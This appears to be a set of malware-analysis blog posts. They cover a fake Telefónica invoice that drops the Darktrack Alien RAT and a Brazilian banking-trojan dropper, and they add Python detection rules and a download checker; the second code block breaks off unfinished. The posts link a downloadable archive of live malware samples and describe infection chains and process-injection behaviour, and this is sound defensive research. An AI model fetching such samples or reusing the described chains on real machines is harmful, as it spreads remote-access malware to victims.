<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizHLJu6ThOUr-m_iLcOD797QMedCscPApzB-XWyPhhyf8rxMs3gTNsCZ82jCJVmj7pd3W3LScK03cUGr6hgHhalhhK5MEzZawshWYgiqAN1uWy605YQnY7gBlqAiP-cV5x7Yr2hwty5VA/s1600/11.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="221" data-original-width="1253" height="112" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizHLJu6ThOUr-m_iLcOD797QMedCscPApzB-XWyPhhyf8rxMs3gTNsCZ82jCJVmj7pd3W3LScK03cUGr6hgHhalhhK5MEzZawshWYgiqAN1uWy605YQnY7gBlqAiP-cV5x7Yr2hwty5VA/s640/11.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Recommendations: review the permissions an app requests before installing it; do not put much weight on positive ratings, since many of them can be fake or obtained by bombarding users with ads and aggressive prompts; and finally, run an antivirus on the device.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://koodous.com/apks/1584174767c12ec6896a7cda9ca0656205e2bece916445b2d6e145fb0ae3cb06">Sample</a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #444444; font-family: arial, helvetica, sans-serif; font-size: 13px;">That's all for now, @Dkavalanche 2017</span></div>
<br />
<br />@Dkavalanchehttp://www.blogger.com/profile/05803700040566483414noreply@blogger.com1tag:blogger.com,1999:blog-4220472203730425546.post-40481687562616291552017-04-28T11:00:00.002-07:002017-04-28T11:00:18.563-07:00<b>Fake Telefónica Argentina electronic invoice downloads a Trojan<span style="background-color: #f5f8fa; color: #14171a; font-family: "arial" , sans-serif; font-size: 14px; white-space: pre-wrap;"> (Darktrack Alien RAT)</span></b><br />
<span style="background-color: #f5f8fa; color: #14171a; font-family: "arial" , sans-serif; font-size: 14px; white-space: pre-wrap;"><br /></span>
<span style="background-color: #f5f8fa; color: #14171a; font-family: "arial" , sans-serif; font-size: 14px; white-space: pre-wrap;"><br /></span>
<span style="background-color: white; color: #14171a; font-family: "arial" , sans-serif; font-size: 14px; white-space: pre-wrap;">Raúl's <a href="https://twitter.com/rfb_/status/850353115350147076">warning</a> on his Twitter caught my attention, so we took a look at it.</span><br />
<span style="background-color: white; color: #14171a; font-family: "arial" , sans-serif; font-size: 14px; white-space: pre-wrap;"><br /></span>
<span style="color: #14171a; font-family: arial, sans-serif;"><span style="background-color: white; font-size: 14px; white-space: pre-wrap;">The phishing email is a copy of Telefónica Argentina's digital invoice, with a download link that points to a .DOC document hosted on Dropbox.</span></span><br />
<span style="color: #14171a; font-family: arial, sans-serif;"><span style="background-color: white; font-size: 14px; white-space: pre-wrap;"><br /></span></span>
<span style="color: #14171a; font-family: arial, sans-serif;"><span style="background-color: white; font-size: 14px; white-space: pre-wrap;"><br /></span></span>
<span style="color: #14171a; font-family: arial, sans-serif;"><span style="background-color: white; font-size: 14px; white-space: pre-wrap;">Once the document is opened, it tells us to enable content so that the auto-open macro can run.</span></span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfw6Dosc60oTQ7bFG0-h33YZt3PPku6eQSpiyey9EnAmVBFBO21gxTObUEKbp6ivqTBNriWl_pwuTgIY1yBes2DbEi_0IDQxEGGqA15cf-QYF12nHnnrD4zSQlVWko4HG-QZv3L7HCCok/s1600/00.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="308" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfw6Dosc60oTQ7bFG0-h33YZt3PPku6eQSpiyey9EnAmVBFBO21gxTObUEKbp6ivqTBNriWl_pwuTgIY1yBes2DbEi_0IDQxEGGqA15cf-QYF12nHnnrD4zSQlVWko4HG-QZv3L7HCCok/s400/00.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">The macro opens a decoy image and runs a .vbs from <span style="background-color: white; color: #333333; white-space: pre-wrap;">%appdata%</span>/temp, which in turn ends up running an .exe that is hardcoded in the .vbs.</span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMWLoR-G1O8gdy1HLNjkKOBzxRZx005FCkoGDzERmJ3kZD09CQRJXrVXYR0MjAX7a-52ki0wD9BKm_uCLnrjvpah5eorx-1Fk5eSCrvnC24xRiUQdA5LJ9UmuYFquW8s9d0Go58IL0TJQ/s1600/01.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="356" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMWLoR-G1O8gdy1HLNjkKOBzxRZx005FCkoGDzERmJ3kZD09CQRJXrVXYR0MjAX7a-52ki0wD9BKm_uCLnrjvpah5eorx-1Fk5eSCrvnC24xRiUQdA5LJ9UmuYFquW8s9d0Go58IL0TJQ/s640/01.jpg" width="640" /></a></div>
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQI712pXQMM-WlcUYnBX21Yzt66FK5rx0h9ZcW1iQNxdK3Q0FKO1miNqxeoGhsiyz9YWAf_gt-WQ6QDLnA7zFUDfsjmfQreqfX8HOCnHr3uaQakwCl6OdgeN9jtDQh7faRUekgUQC2WZU/s1600/04.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="404" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQI712pXQMM-WlcUYnBX21Yzt66FK5rx0h9ZcW1iQNxdK3Q0FKO1miNqxeoGhsiyz9YWAf_gt-WQ6QDLnA7zFUDfsjmfQreqfX8HOCnHr3uaQakwCl6OdgeN9jtDQh7faRUekgUQC2WZU/s640/04.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">This executable unpacks two threats.</span></div>
<div class="" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Here we see the persistence on the system:</span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6cZ3D1cWAgyiwR0lP7KrCLMmHF66rTRbudMLQ4HD5SirfP_0O_gbzF7w_X2SfuBAdccw5hxNlqNgLa1d16OwUqk12MW29H7faVpcsqd5Q4KQ0kKQZF3TWZc3jcY6pAxMX2QF_Rkas_Tg/s1600/05.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="26" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6cZ3D1cWAgyiwR0lP7KrCLMmHF66rTRbudMLQ4HD5SirfP_0O_gbzF7w_X2SfuBAdccw5hxNlqNgLa1d16OwUqk12MW29H7faVpcsqd5Q4KQ0kKQZF3TWZc3jcY6pAxMX2QF_Rkas_Tg/s640/05.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">https://www.virustotal.com/es/file/68dfe14103ffa2befb39d8bda4bd65e09eff90de6b2c203e6ba5a7810053c089/analysis/1491585453/</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">https://www.virustotal.com/es/file/d4ba451fae6310e27806d10e5835f08263a8c5f0308fa1eaa151870a1c3f154a/analysis/1491585564/</span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">The threat injects itself into a Notepad.exe process.</span></div>
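<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">The two behaviours described so far, the document macro launching a .vbs from %appdata%/temp that drops an .exe, and the payload injecting into Notepad.exe to talk to its C&amp;C, are both cheap to detect from process-creation and network telemetry. The following is an added example (my own code, not from the original post) that runs three such rules over a constructed Sysmon-style event timeline; all paths, PIDs, file names and the destination address are constructed sample values, not indicators from the sample.</span></div>

```python
# Added example (not code from the original post): detection logic for the
# chain described above, run over constructed Sysmon-style events.
# Paths, PIDs, file names and the destination address are constructed samples.
import ntpath
from dataclasses import dataclass
from typing import List, Tuple

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Directories a low-privilege user can write to; a script or binary launched
# from here by an Office document is the pattern the post describes.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\")
# Programs that never legitimately open a socket; the RAT injects into
# notepad.exe and talks to its C&C from there (TClientSocket in the strings).
NO_NETWORK_EXPECTED = {"notepad.exe"}


@dataclass
class Event:
    kind: str               # "process" (creation) or "network" (outbound connect)
    pid: int
    image: str              # full path of the process that generated the event
    parent_image: str = ""  # full path of the parent, process events only
    command_line: str = ""
    dest: str = ""          # "ip:port", network events only


def _basename(path: str) -> str:
    return ntpath.basename(path).lower()


def _user_writable(path: str) -> bool:
    low = path.lower()
    return any(marker in low for marker in USER_WRITABLE)


def detect(events: List[Event]) -> List[Tuple[str, int]]:
    """Return (rule_name, pid) for every event that matches one of the three rules."""
    alerts = []
    for ev in events:
        if ev.kind == "process":
            child, parent = _basename(ev.image), _basename(ev.parent_image)
            if parent in OFFICE_APPS and child in SCRIPT_HOSTS and _user_writable(ev.command_line):
                alerts.append(("office_spawns_script_from_user_dir", ev.pid))
            elif parent in SCRIPT_HOSTS and child.endswith(".exe") and _user_writable(ev.image):
                alerts.append(("script_host_spawns_exe_from_user_dir", ev.pid))
        elif ev.kind == "network" and _basename(ev.image) in NO_NETWORK_EXPECTED:
            alerts.append(("network_from_non_network_app", ev.pid))
    return alerts


# Constructed sample timeline mirroring the post: Word -> wscript.exe running a
# .vbs under %APPDATA%\temp -> dropped .exe -> notepad.exe reaching out.
SAMPLE_EVENTS = [
    Event("process", 1200, r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
          r"C:\Windows\explorer.exe", "WINWORD.EXE /n factura.doc"),
    Event("process", 1300, r"C:\Windows\System32\wscript.exe",
          r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
          r'wscript.exe "C:\Users\victim\AppData\Roaming\temp\foto.vbs"'),
    Event("process", 1400, r"C:\Users\victim\AppData\Roaming\temp\update.exe",
          r"C:\Windows\System32\wscript.exe", "update.exe"),
    Event("process", 1500, r"C:\Windows\System32\notepad.exe",
          r"C:\Users\victim\AppData\Roaming\temp\update.exe", "notepad.exe"),
    Event("network", 1500, r"C:\Windows\System32\notepad.exe", dest="203.0.113.10:443"),
    # Benign control: a logon script run by Explorer from a system path must not fire.
    Event("process", 1600, r"C:\Windows\System32\wscript.exe",
          r"C:\Windows\explorer.exe", r"wscript.exe C:\Windows\logon.vbs"),
]

if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"{rule}: pid {pid}")
```

<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">The last event is a control: a script host started by Explorer from a system directory does not match, because the rules key on the parent process and on the user-writable location together rather than on wscript.exe alone.</span></div>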
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhx5xGqJ5E7RTVEBJHL9gqfmGLnt3OJWRJ3HZQbAB9B8JzsT4QcYGo21CIUx6yW-PP6p04ko0KKwKNXru5zC3Fn28GGxyoxq1FlwgEv2V2_rI9LTkoIKfjCIjJOdTv2YypGVF4vxxCSQYI/s1600/c%2526c2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="46" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhx5xGqJ5E7RTVEBJHL9gqfmGLnt3OJWRJ3HZQbAB9B8JzsT4QcYGo21CIUx6yW-PP6p04ko0KKwKNXru5zC3Fn28GGxyoxq1FlwgEv2V2_rI9LTkoIKfjCIjJOdTv2YypGVF4vxxCSQYI/s640/c%2526c2.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Interesting strings</span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3xlXGbhWWdke4hwTBUmT2GOQo7k_Ao_p4mvHiyuzIsu0pOFwDnI-twCpbPUkRIkX8rGlJRF2LnMeC8E3tOQtf3Pwp2dW77MZU20w8DYshNCHJe3rNTlSi4UqpRRcAWtJNT3pkGl_L4E0/s1600/06.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="354" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3xlXGbhWWdke4hwTBUmT2GOQo7k_Ao_p4mvHiyuzIsu0pOFwDnI-twCpbPUkRIkX8rGlJRF2LnMeC8E3tOQtf3Pwp2dW77MZU20w8DYshNCHJe3rNTlSi4UqpRRcAWtJNT3pkGl_L4E0/s640/06.jpg" width="640" /></a></div>
<br />
<br />
<br />
080IAM010010DAR8K89TR3SDTACK<br />
<span style="color: red;"><b>4.1 Alien+</b></span><br />
Local User<br />
123456<br />
127.0.0.1<br />
notepad.exe<br />
SYSTEMROOT<br />
WINDIR<br />
APPDATA<br />
ZYYd<br />
(D@<br />
TClientSocket<br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">Everything indicates that it is the following RAT:</span><br />
<br />
www[.]nulled[.]to[/]topic[/]186564-darktrack-41-alien-legit-verion-remote-admin-tool/<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEpZ2y7HMlNvgwTBiDTaph9eqcemOqTNZP3aQY3wZSXRuzF054WjZBj0IsHJYNHpqc0G_yQc7DZZiduYK0JhTdV3K_8ce5pK8vJC1NbJorEvivcDlhzjrMvuU_7om0V_6ma16pf2kV6s4/s1600/aliendark.jpg.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="230" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEpZ2y7HMlNvgwTBiDTaph9eqcemOqTNZP3aQY3wZSXRuzF054WjZBj0IsHJYNHpqc0G_yQc7DZZiduYK0JhTdV3K_8ce5pK8vJC1NbJorEvivcDlhzjrMvuU_7om0V_6ma16pf2kV6s4/s400/aliendark.jpg.jpg" width="400" /></a></div>
<br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">Communication with the C&amp;C</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjN6bCoXCet7rVHbjzF1cRLERyDdmePCrS8tEirqLvZUm1nXb-E1Skxzl2aSj67jJNZeT-1f1sQ8pYJR5T95LddZFgUtOaNDao4a5Gmv1k_Iwr4cI4LnJJYsEfPcxTsoB3X0ZonJHtoWJU/s1600/c%2526c.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="92" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjN6bCoXCet7rVHbjzF1cRLERyDdmePCrS8tEirqLvZUm1nXb-E1Skxzl2aSj67jJNZeT-1f1sQ8pYJR5T95LddZFgUtOaNDao4a5Gmv1k_Iwr4cI4LnJJYsEfPcxTsoB3X0ZonJHtoWJU/s640/c%2526c.jpg" width="640" /></a></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-SHEIRHRngBQBXbGG4dRAJ8C6DM3FlfwUCSiNKPvmHUTAl3ParRr9EgcLjZLFmE5SCpX4MgPG6aQ11k_-4ChWKvVroqLRFFGua_E7C2YMxEdq-tVihlj9vdN4zyX_XPCsKee-7Aik15w/s1600/final.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="42" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-SHEIRHRngBQBXbGG4dRAJ8C6DM3FlfwUCSiNKPvmHUTAl3ParRr9EgcLjZLFmE5SCpX4MgPG6aQ11k_-4ChWKvVroqLRFFGua_E7C2YMxEdq-tVihlj9vdN4zyX_XPCsKee-7Aik15w/s640/final.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">This threat is used to take control of the victim's PC; it can upload and execute other threats, such as ransomware.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Samples: https://www.dropbox.com/s/9wyu52hn2itmqb9/malw%20-07-04-17-telefonica.7z?dl=0</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #444444; font-family: arial, helvetica, sans-serif; font-size: 13px;">That's all for now. @Dkavalanche 2017</span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
@Dkavalanchehttp://www.blogger.com/profile/05803700040566483414noreply@blogger.com1tag:blogger.com,1999:blog-4220472203730425546.post-70982747606761755852017-03-31T10:55:00.001-07:002017-03-31T10:56:30.042-07:00<b><span style="font-family: "arial" , "helvetica" , sans-serif;">Brazilian Trojan: Targets several banking institutions in Brazil.</span></b><br />
<b><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></b>
<span style="font-family: "arial" , "helvetica" , sans-serif;">The threat arrives via the following spear phishing email.</span><br />
<b><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></b>
<span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: white;"><b>Subject: </b></span><span style="background-color: white; color: #333333; font-size: 21px;">Seu CPF/CNPJ Sera incluso no SPC/SERASA, Por falta de Pagamento. Protc.:2017-30656</span></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNjjRrsC8hdriKB27VItW2i9-VwTpDw27BxOcPwhyKWxtjMMNjZWnUCN0bUYh5kaa4jq4uwX4F2Fe8JAbWTjRnXzLADHcxnLKCxfXBbpVipggLBTE6zbJTBQxlqwvKJAFPH1eu2d6r_Z8/s1600/Clipboard01.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="288" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNjjRrsC8hdriKB27VItW2i9-VwTpDw27BxOcPwhyKWxtjMMNjZWnUCN0bUYh5kaa4jq4uwX4F2Fe8JAbWTjRnXzLADHcxnLKCxfXBbpVipggLBTE6zbJTBQxlqwvKJAFPH1eu2d6r_Z8/s400/Clipboard01.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">The link downloads a ZIP containing an executable.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9WVmKmfu2jbA45yOlUdRoGR826p5fgHAv_UUdK44HquWHHGIhIwDniAdZVvj-8sgiC-HeGHiGEntOB26DgWrdYGLOWs-oIsp4eZed-z5cjnU0a7e-ViDQkXRQl0BRcgfUJ34fr41suVw/s1600/Clipboard02.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="136" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9WVmKmfu2jbA45yOlUdRoGR826p5fgHAv_UUdK44HquWHHGIhIwDniAdZVvj-8sgiC-HeGHiGEntOB26DgWrdYGLOWs-oIsp4eZed-z5cjnU0a7e-ViDQkXRQl0BRcgfUJ34fr41suVw/s640/Clipboard02.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Icon of the application:</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrUrT0WkJ8xJIBoYoI0_HiRNSZ3A-winKAmuiKA9a1VcAeeXk8hLHQpUE2QYiUydD0IrwkEEC6ktUoKoMA4x0Xniq9bEALHIzfJWQ6sfXWNan6doX0swYdrh7xUMsn_nY1n1zFUgaMCro/s1600/icono.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrUrT0WkJ8xJIBoYoI0_HiRNSZ3A-winKAmuiKA9a1VcAeeXk8hLHQpUE2QYiUydD0IrwkEEC6ktUoKoMA4x0Xniq9bEALHIzfJWQ6sfXWNan6doX0swYdrh7xUMsn_nY1n1zFUgaMCro/s320/icono.jpg" width="281" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmSxGpTosMtsXp5ESdHUE_shKIGhyphenhyphenKWdbKtsopVApXV_vZRnqg3-UQVS-ZnFKQR_XkqzuNNVAYwhAMpItzO70C9jgQzJK9DAFmhHEqd2C0b5MXyGqDqxgJG4Iu4keh-uAnt2qfjjbFw8I/s1600/Clipboard03.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="171" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmSxGpTosMtsXp5ESdHUE_shKIGhyphenhyphenKWdbKtsopVApXV_vZRnqg3-UQVS-ZnFKQR_XkqzuNNVAYwhAMpItzO70C9jgQzJK9DAFmhHEqd2C0b5MXyGqDqxgJG4Iu4keh-uAnt2qfjjbFw8I/s640/Clipboard03.jpg" width="640" /></a></div>
<div class="" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b><br /></b></span></div>
<div class="" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b>Analysis of the dropper.</b></span></div>
<div class="" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Interesting strings: we can see where the payload is downloaded from, and its very poor obfuscation method.</span></div>
<div class="" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiajqavdMdEtaQhs1fokxNkflCnsBsrUIkZIwvhc0fyleHRFvXEAHF3RG2xZTxvGDh9SNkHKNQGwdKMEv9e_2Wcb2vd1wLBiM4itnPPCzdRtPeY_9869BfcCJ7PX1otWXOFy6ajvFulrCs/s1600/05.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="268" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiajqavdMdEtaQhs1fokxNkflCnsBsrUIkZIwvhc0fyleHRFvXEAHF3RG2xZTxvGDh9SNkHKNQGwdKMEv9e_2Wcb2vd1wLBiM4itnPPCzdRtPeY_9869BfcCJ7PX1otWXOFy6ajvFulrCs/s640/05.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Basic anti-debugging protection</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg95serqLomPbt59N2d1V9lyb0RaWEjSGFdqBPd8pqw6qIAuaDkvZVhsS4vNi0J_wHj_AoraUk7iLUGk4AR_WOryM0w6UYddWfH2lEiUcvMFw3KZHyezxs7J3X3XWjzxYyYnMkeN21UxQc/s1600/05-b.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="111" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg95serqLomPbt59N2d1V9lyb0RaWEjSGFdqBPd8pqw6qIAuaDkvZVhsS4vNi0J_wHj_AoraUk7iLUGk4AR_WOryM0w6UYddWfH2lEiUcvMFw3KZHyezxs7J3X3XWjzxYyYnMkeN21UxQc/s320/05-b.jpg" width="320" /></a></div>
<br />
<br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">Call to the function that downloads the payload.</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggFq5LRj6L2TgRZxVRl4-KiiTHyH6Q1bXZJplZh7fri4MIV86Ak2CqulGwGKoPtdGVgMZVMcZJK-9WGH9-oPGRiQnt1AcGxioaW2Nuvhq_2-IcMDb9epsHh3iae_sB9xS1DaPVg7vkRwE/s1600/07.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="196" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggFq5LRj6L2TgRZxVRl4-KiiTHyH6Q1bXZJplZh7fri4MIV86Ak2CqulGwGKoPtdGVgMZVMcZJK-9WGH9-oPGRiQnt1AcGxioaW2Nuvhq_2-IcMDb9epsHh3iae_sB9xS1DaPVg7vkRwE/s400/07.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Here we can see the malware URL (we had already seen it in the strings section, where it was very poorly obfuscated).</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">The file extension is .zip, but it is not a ZIP archive: the file is encoded, and the downloader decodes it into an .exe and runs it with ShellExecuteA.</span></div>
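<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Both downloads in this chain, the ZIP from the phishing link that carries an executable and the second-stage ".zip" that is not an archive at all, can be caught at a mail or web gateway by trusting magic bytes rather than the file name. The following is an added example (my own code, not from the original post or the malware) of that check; it parses real ZIP archives with Python's zipfile module and flags a .zip with no archive header as the encoded-payload case the post describes. All file names and contents are constructed sample values.</span></div>

```python
# Added example (not code from the original post): a gateway-style check for
# the two downloads in this chain, a ZIP that carries an executable and a file
# named .zip that is not an archive at all. Names and contents are constructed.
import io
import ntpath
import zipfile
from typing import Dict, List

EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".pif", ".dll", ".vbs", ".js", ".bat", ".cmd"}


def sniff(data: bytes) -> str:
    """Identify the container by magic bytes rather than by name."""
    if data.startswith(b"PK\x03\x04"):   # ZIP local file header
        return "zip"
    if data.startswith(b"MZ"):           # PE / DOS executable header
        return "exe"
    return "unknown"


def inspect_download(filename: str, data: bytes) -> Dict[str, object]:
    """Compare the claimed extension with the real content and list archive members."""
    claimed = ntpath.splitext(filename)[1].lower()
    actual = sniff(data)
    members: List[str] = []
    verdict = "ok"
    if actual == "zip":
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                members = zf.namelist()
        except zipfile.BadZipFile:
            verdict = "corrupt_archive"
        else:
            if any(ntpath.splitext(m)[1].lower() in EXECUTABLE_EXTS for m in members):
                verdict = "archive_contains_executable"
    elif actual == "exe" and claimed != ".exe":
        verdict = "executable_with_disguised_extension"
    elif actual == "unknown" and claimed == ".zip":
        # The case in the post: a ".zip" that is really an encoded .exe the
        # downloader decodes itself, so no archive header is present.
        verdict = "not_a_real_archive"
    return {"name": filename, "claimed": claimed, "actual": actual,
            "members": members, "verdict": verdict}


def build_zip(member_name: str, content: bytes) -> bytes:
    """Constructed in-memory archive used as sample input."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(member_name, content)
    return buf.getvalue()


SAMPLES = {
    # Stage 1 in the post: the phishing link serves a ZIP with an .exe inside.
    "Protocolo.zip": build_zip("Protocolo.exe", b"MZ" + b"\x00" * 64),
    # Stage 2 in the post: named .zip, but the bytes are an encoded payload.
    "payload.zip": bytes(range(0x41, 0x5b)) * 8,
    # An executable hiding behind a picture extension.
    "foto.jpg": b"MZ\x90\x00" + b"\x00" * 32,
    # A harmless archive for comparison.
    "readme.zip": build_zip("readme.txt", b"nothing to see here"),
}


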